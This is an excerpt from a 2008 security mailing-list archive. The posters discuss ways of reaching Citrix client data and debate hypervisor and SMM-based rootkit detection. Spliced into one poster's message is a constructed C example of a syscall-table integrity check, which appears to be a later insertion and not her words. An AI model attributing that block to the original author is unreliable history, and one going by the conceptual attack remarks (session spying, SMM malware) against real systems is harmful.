> them analyzed, it's really annoying.
>
> -dave
>
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave

Is this sandboxing running outside of the hypervisor or inside? One thing I've been messing with lately is sandboxing from outside the guest OS by modifying a hypervisor to manipulate the kernel through external hooks. I'm really curious if this has been done before and if I'm just reinventing the wheel.
--
Anthony Lineberry
http://www.dtors.org

From dave.korn at artimi.com Thu Feb 28 09:32:49 2008
From: dave.korn at artimi.com (Dave Korn)
Date: Thu, 28 Feb 2008 14:32:49 -0000
Subject: [Dailydave] Owning Citrix & Terminal Services Clients
In-Reply-To: <20080227181732.GA5679@d2sec.com>
References: <20080227181732.GA5679@d2sec.com>
Message-ID: <008c01c87a16$cb35a9a0$2e08a8c0@CAM.ARTIMI.COM>

On 27 February 2008 18:18, DSquare Security wrote:
> There are at least two interesting ways to access client data
> 1) Spying on his session to get passwords from a published application
> 2) Accessing his local drives if they are mapped in the session

Not to mention the IPC$ share and all those pipes you can't get at (because of RestrictAnonymous=1 these days) without being authenticated.

cheers,
DaveK
--
Can't think of a witty .sigline today....

From matt.richard at gmail.com Thu Feb 28 18:43:57 2008
From: matt.richard at gmail.com (Matt Richard)
Date: Thu, 28 Feb 2008 18:43:57 -0500
Subject: [Dailydave] VPC
In-Reply-To:
References: <47BD746D.5040201@immunityinc.com>
Message-ID: <276004ce0802281543l16babc4bja6be34c4fdbbdef7@mail.gmail.com>

On Mon, Feb 25, 2008 at 10:34 PM, Anthony Lineberry wrote:
> Is this sandboxing running outside of the hypervisor or inside?
> One thing I've been messing with lately is sandboxing from outside the guest
> OS by modifying a hypervisor to manipulate the kernel through external
> hooks. I'm really curious if this has been done before and if I'm just
> reinventing the wheel?

I have only seen defensive implementations such as the work of Garfinkel and Rosenblum at Stanford. Their use case is a modified hypervisor that can monitor critical OS data structures. One of their implementations watches the Linux system call table and can prevent modification to thwart rootkits.

http://www.cs.fit.edu/%7Epkc/id/related/garfinkel03ndssVM.pdf

I think it's a great idea, I'd be interested in seeing any published work you have on the topic.
Regards,
Matt

From jon at oberheide.org Fri Feb 29 09:57:45 2008
From: jon at oberheide.org (Jon Oberheide)
Date: Fri, 29 Feb 2008 09:57:45 -0500
Subject: [Dailydave] VPC
In-Reply-To: <276004ce0802281543l16babc4bja6be34c4fdbbdef7@mail.gmail.com>
References: <47BD746D.5040201@immunityinc.com> <276004ce0802281543l16babc4bja6be34c4fdbbdef7@mail.gmail.com>
Message-ID: <1204297065.6223.1.camel@apollo>

On Thu, 2008-02-28 at 18:43 -0500, Matt Richard wrote:
> On Mon, Feb 25, 2008 at 10:34 PM, Anthony Lineberry
> wrote:
> > Is this sandboxing running outside of the hypervisor or inside?
> > One thing I've been messing with lately is sandboxing from outside the guest
> > OS by modifying a hypervisor to manipulate the kernel through external
> > hooks. I'm really curious if this has been done before and if I'm just
> > reinventing the wheel?
>
> I have only seen defensive implementations such as the work of
> Garfinkel and Rosenblum at Stanford. Their use case is a modified
> hypervisor that can monitor critical OS data structures. One of their
> implementations watches the Linux system call table and can prevent
> modification to thwart rootkits.

In related news, VMware just recently announced VMsafe:
http://www.vmware.com/overview/security/vmsafe.html

--
Jon Oberheide
GnuPG Key: 1024D/F47C17FE
Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE
From rodrigo at kernelhacking.com Fri Feb 29 07:56:11 2008
From: rodrigo at kernelhacking.com (Rodrigo Rubira Branco (BSDaemon))
Date: Fri, 29 Feb 2008 12:56:11 -0000
Subject: [Dailydave] VPC
Message-ID: <20080229155611.8DA988BF42@mail.fjaunet.com.br>

> I have only seen defensive implementations such as the work of
> Garfinkel and Rosenblum at Stanford. Their use case is a modified
> hypervisor that can monitor critical OS data structures. One of their
> implementations watches the Linux system call table and can prevent
> modification to thwart rootkits.
>
> I think it's a great idea, I'd be interested in seeing any published
> work you have on the topic.

StMichael running in SMM tries to accomplish the same in architectures where virtualization is not supported:
http://www.kernelhacking.com/rodrigo/docs/H2HCIV.pdf

The idea is to port it also to be implemented using the hypervisor support of the modern processors...

cya,
Rodrigo (BSDaemon)
--
www.kernelhacking.com/rodrigo

From joanna at invisiblethings.org Fri Feb 29 13:17:43 2008
From: joanna at invisiblethings.org (Joanna Rutkowska)
Date: Fri, 29 Feb 2008 19:17:43 +0100
Subject: [Dailydave] VPC
In-Reply-To: <20080229155611.8DA988BF42@mail.fjaunet.com.br>
References: <20080229155611.8DA988BF42@mail.fjaunet.com.br>
Message-ID: <47C84C47.6010307@invisiblethings.org>

Rodrigo Rubira Branco (BSDaemon) wrote:
| StMichael running in SMM tries to accomplish the same in architectures where
| virtualization is not supported:
| http://www.kernelhacking.com/rodrigo/docs/H2HCIV.pdf

Let me point out some issues here:

1) On slide #13 you refer to me (at least I assume it is me): "Joanna said we need a new hardware-help [to protect against kernel compromises], really?"
and then on slide #21 you explain: "That's [i.e. protecting against protector's code tampering] the motivation in the Joanna's comment about we need new hardware helping us..."

So, let me explain, that the biggest problem with kernel compromise detection I have been talking about for at least 2 years now, is the fact that we don't know all the possible hooking places (type II hooking places) that an attacker might use, *not* the problem of tamper proof detector code.

Another reason for seeking help in hardware, this time when implementing kernel protection (as opposed to detection), is that for an effective protection we need to move drivers (or groups of drivers) into separate domains/address spaces. We can not effectively do that without IOMMU/VT-d.

2) On slide #54 you write: "The idea of putting the entire kernel as read-only seems good". Let me just point out that there is no such thing as a "read-only kernel" -- the kernel is a program, and as every program it also needs to use and operate on *data* that change all the time and cannot be made read-only by definition. So even if you can force the kernel *code* to be read-only (which is a good idea indeed, and digital signatures are useful in actually verifying this property), the kernel as a whole is always read/write. It seems to me that StMichael focuses more on detecting rootkit's code rather than ensuring system integrity. Just out of curiosity I would love to see a list of all the places that are checked by StMichael.

3) While the whole idea of putting own code into SMM seems interesting, I see it much more useful for writing kernel malware rather than security tools. I really don't see a reason why to use this "hack" instead of using the virtualization technology, which was designed just for such tasks among others?

4) BTW, AFAIK modern laptops have their SMRAM locked down just after it is initialized by SMM. Are you going to bypass this locking mechanism in order to install your protection system?
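A constructed version of the check Matt attributes to Garfinkel and Rosenblum earlier in this thread (a monitor outside the guest watching the system call table), pinned to the two properties Joanna's point 2 separates: kernel text can be made read-only and verified, the syscall table can be compared against a golden copy, but a function pointer living in a driver's data is outside both. This is an added example, not Livewire's, StMichael's or VMsafe's code; the guest image, its addresses, the FNV hash and the "rootkit" modifications are stand-ins for what a real monitor would read and see through the VMM.

```c
/* Added example (not Livewire's or StMichael's code): the kind of check an
 * out-of-guest monitor runs over a snapshot of guest kernel memory, here a
 * constructed guest. It pins what can be pinned (kernel text, the syscall
 * table) and deliberately shows the blind spot: a function pointer
 * overwritten in a driver's data is not in the checked set. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define NR_SYSCALLS 8
#define TEXT_LEN    64

struct guest_image {
    uintptr_t text_start, text_end;          /* guest kernel .text range */
    uint8_t   text[TEXT_LEN];                /* .text bytes as read via the VMM */
    uintptr_t sys_call_table[NR_SYSCALLS];   /* pinned by the monitor */
    uintptr_t driver_dispatch[2];            /* a driver's data: not pinned */
};

struct check_result { int text_tampered; int hooked_entries; int first_hooked; };

/* FNV-1a over kernel text. The golden value is recorded by the monitor at
 * guest boot, before untrusted code runs; the guest never holds it. */
uint64_t fnv1a64(const uint8_t *p, size_t n)
{
    uint64_t h = 0xcbf29ce484222325ULL;
    for (size_t i = 0; i < n; i++) { h ^= p[i]; h *= 0x100000001b3ULL; }
    return h;
}

/* Detection pass: text hash plus per-entry compare against the golden table.
 * The range test is a second line of defence: even without a golden copy,
 * an entry pointing outside .text is wrong by construction. */
struct check_result vmi_check(const struct guest_image *g,
                              const uintptr_t golden[NR_SYSCALLS],
                              uint64_t golden_text_hash)
{
    struct check_result r = { 0, 0, -1 };
    r.text_tampered = fnv1a64(g->text, TEXT_LEN) != golden_text_hash;
    for (int i = 0; i < NR_SYSCALLS; i++) {
        uintptr_t e = g->sys_call_table[i];
        int in_text = e >= g->text_start && e < g->text_end;
        if (e != golden[i] || !in_text) {
            r.hooked_entries++;
            if (r.first_hooked < 0) r.first_hooked = i;
        }
    }
    return r;
}

/* Enforcement, Livewire style: the monitor writes the golden entries back
 * into guest memory. Returns the number of entries restored. */
int vmi_restore_table(struct guest_image *g, const uintptr_t golden[NR_SYSCALLS])
{
    int n = 0;
    for (int i = 0; i < NR_SYSCALLS; i++)
        if (g->sys_call_table[i] != golden[i]) { g->sys_call_table[i] = golden[i]; n++; }
    return n;
}

/* Constructed clean guest plus the golden values taken at "boot". */
void make_clean_guest(struct guest_image *g, uintptr_t golden[NR_SYSCALLS], uint64_t *golden_hash)
{
    memset(g, 0, sizeof *g);
    g->text_start = 0xC0100000u;
    g->text_end   = g->text_start + TEXT_LEN;
    for (size_t i = 0; i < TEXT_LEN; i++) g->text[i] = (uint8_t)(0x90 + i % 7);
    for (int i = 0; i < NR_SYSCALLS; i++)
        g->sys_call_table[i] = golden[i] = g->text_start + 8u * (uintptr_t)i;
    g->driver_dispatch[0] = g->text_start + 16;
    g->driver_dispatch[1] = g->text_start + 24;
    *golden_hash = fnv1a64(g->text, TEXT_LEN);
}

/* Apply one rootkit-style modification to a clean guest and check it.
 * 0 = untouched, 1 = redirect two syscalls (one outside .text, one inside),
 * 2 = patch a byte of kernel text, 3 = overwrite a driver function pointer. */
struct check_result scenario(int variant)
{
    struct guest_image g; uintptr_t golden[NR_SYSCALLS]; uint64_t h;
    make_clean_guest(&g, golden, &h);
    if (variant == 1) { g.sys_call_table[3] = 0xDEADBEEFu; g.sys_call_table[5] = g.text_start + 44; }
    if (variant == 2) { g.text[10] ^= 0xFF; }
    if (variant == 3) { g.driver_dispatch[0] = 0xDEADBEEFu; }   /* the blind spot */
    return vmi_check(&g, golden, h);
}

/* Hook, restore, re-check: returns the number of entries still hooked. */
int scenario_restore(void)
{
    struct guest_image g; uintptr_t golden[NR_SYSCALLS]; uint64_t h;
    make_clean_guest(&g, golden, &h);
    g.sys_call_table[3] = 0xDEADBEEFu;
    vmi_restore_table(&g, golden);
    return vmi_check(&g, golden, h).hooked_entries;
}

int main(void)
{
    for (int v = 0; v <= 3; v++) {
        struct check_result r = scenario(v);
        printf("variant %d: text_tampered=%d hooked=%d first=%d\n",
               v, r.text_tampered, r.hooked_entries, r.first_hooked);
    }
    printf("after restore: hooked=%d\n", scenario_restore());
    return 0;
}
```

Variant 3 is the point: the monitor reports the guest clean although a dispatch pointer was redirected, because nobody told it that pointer belongs to the integrity set. Enumerating those places (the type II hooking places above) is the hard problem, and it is the same problem whether the checker sits in a hypervisor or in SMM; locking SMRAM changes who can tamper with the checker, not what the checker knows to look at.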
Cheers,
joanna.

From joanna at invisiblethings.org Fri Feb 29 13:49:18 2008
From: joanna at invisiblethings.org (Joanna Rutkowska)
Date: Fri, 29 Feb 2008 19:49:18 +0100
Subject: [Dailydave] VPC
In-Reply-To: <47C84C47.6010307@invisiblethings.org>
References: <20080229155611.8DA988BF42@mail.fjaunet.com.br> <47C84C47.6010307@invisiblethings.org>
Message-ID: <47C853AE.3090404@invisiblethings.org>

Joanna Rutkowska wrote:
| 4) BTW, AFAIK modern laptops have their SMRAM locked down just after
| it is initialized by SMM. Are you going to bypass this locking
| mechanism in order to install your protection system?

s/SMM/BIOS/ in the text above.

joanna.